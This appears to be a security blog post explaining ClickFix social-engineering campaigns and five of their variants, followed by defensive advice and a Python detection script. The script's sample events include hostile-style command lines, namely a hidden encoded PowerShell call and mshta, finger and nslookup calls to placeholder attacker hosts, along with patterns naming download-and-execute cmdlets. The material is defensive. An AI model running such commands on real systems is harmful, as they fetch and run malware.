Over the last year, cybercriminals have increasingly used a trick called ClickFix to get people to run harmful software on their own computers. The core idea is always the same — attackers use social engineering to convince someone to execute a command that ends up installing malware on their machine. In most cases, that command is a PowerShell script that runs with the person’s own permissions, making it easy for the attacker to take control.
How ClickFix grew and changed
When the ClickFix trend first appeared, the setup was simple: victims were told they needed to “fix” a fake problem or pass a fake CAPTCHA. To do so, they were instructed to copy a long piece of text, open the Windows Run dialog (Win + R), paste the text, and hit Enter. That text was actually a malicious command that gave attackers access.
Since then, attackers have invented a variety of new twists on this basic idea:
1. Using legitimate tools like mshta.exe
In some attacks, users aren’t asked to copy anything — the malicious code is automatically placed on the clipboard without them realising it. The command then launches a legitimate Windows tool (mshta.exe) that connects to the attacker’s server and runs harmful code.
2. Video guides on social platforms
Some campaigns have used TikTok videos that look like harmless tutorials. They tell viewers to open PowerShell with administrator rights and run a command that downloads malware.
3. Using the old Finger network protocol
Another variant tricks users into running commands that connect to a remote server using the outdated Finger protocol. That server sends back a malicious script which installs malware on the victim’s machine.
4. “CrashFix” trick
In this version, attackers create a fake browser extension that pretends to be a useful tool. After it crashes the browser, a fake error message tells the user to run a command. Following the instructions leads to malware installation just like the other ClickFix variants.
5. Payload via DNS lookup
Some attacks add a step where the malicious command makes a DNS request to a server controlled by the attackers. The DNS response contains further code, which then downloads the final malware payload.
How to defend against ClickFix-style attacks
The simplest advice — like blocking Win + R — only stops very basic ClickFix cases. Because attackers now use many different tricks, the most effective defences are:
- Train users to recognise social-engineering scams — anyone who asks people to run unusual commands or perform strange actions is almost certainly doing something malicious.
- Use strong endpoint protection — security software can often block dangerous scripts before they run.
- Monitor network activity — suspicious patterns can indicate that an infection is in progress.
- Consider managed security services if you don’t have in-house expertise.
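To make the "monitor" and "endpoint protection" advice concrete, here is an added example (not code from the original article) of a small detection rule set for the process-creation patterns the five variants above leave behind: a script host launched straight from the Windows shell (a pasted Run-dialog command), mshta.exe fetching a URL, the Finger client, a DNS TXT lookup, and hidden or encoded PowerShell. The event fields are modelled loosely on Sysmon Event ID 1, and every sample event and hostname below is constructed.

```python
import re

# Windows binaries the ClickFix variants above abuse as script hosts or downloaders (constructed list).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "finger.exe", "nslookup.exe", "cmd.exe"}
# PowerShell switches and cmdlets typical of a pasted download-and-execute one-liner.
PS_SUSPICIOUS = re.compile(r"\s-e(c|nc|ncodedcommand)?\b|-w(indowstyle)?\s+hidden|downloadstring|\biex\b|invoke-expression")

def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]

def classify(image: str, parent_image: str, command_line: str) -> list:
    """Return the ClickFix-style indicators matched by one process-creation event.
    Fields are modelled loosely on Sysmon Event ID 1 (Image, ParentImage, CommandLine); an empty list means no match."""
    image, parent, cmd = _basename(image), _basename(parent_image), command_line.lower()
    hits = []
    # Win+R paste: the script host is spawned directly by the desktop shell, not by a script or installer.
    if parent == "explorer.exe" and image in SCRIPT_HOSTS:
        hits.append("interactive-launch")
    if image == "mshta.exe" and re.search(r"https?://", cmd):      # variant 1: mshta pulling remote content
        hits.append("mshta-remote")
    if image == "finger.exe":                                       # variant 3: Finger client is unusual today
        hits.append("finger-protocol")
    if image == "nslookup.exe" and re.search(r"-(q|type|querytype)=txt", cmd):  # variant 5: TXT lookup
        hits.append("dns-txt-payload")
    if image in ("powershell.exe", "pwsh.exe") and PS_SUSPICIOUS.search(cmd):
        hits.append("powershell-download-or-obfuscation")
    return hits

def scan(events) -> list:
    """Return (image basename, indicators) for each (image, parent_image, command_line) event that matched a rule."""
    results = []
    for image, parent_image, command_line in events:
        hits = classify(image, parent_image, command_line)
        if hits:
            results.append((_basename(image), hits))
    return results

# Constructed sample events, not real telemetry: four ClickFix-like launches and one benign scheduled admin script.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe", "powershell -w hidden -enc BASE64PLACEHOLDER"),
    (r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe", "mshta https://captcha.example.invalid/verify.hta"),
    (r"C:\Windows\System32\finger.exe", r"C:\Windows\System32\cmd.exe", "finger user@example.invalid"),
    (r"C:\Windows\System32\nslookup.exe", r"C:\Windows\explorer.exe", "nslookup -type=txt stage.example.invalid"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\svchost.exe", r"powershell.exe -File C:\Scripts\inventory.ps1"),
]

if __name__ == "__main__":
    for image, hits in scan(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(hits)}")
```

The "interactive-launch" rule is the one that generalises across variants, since every ClickFix lure ends with a human starting a script host from the desktop; tune the other patterns to your own telemetry, and expect legitimate admin scripts started by a service or scheduler (the last sample event) to stay silent.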
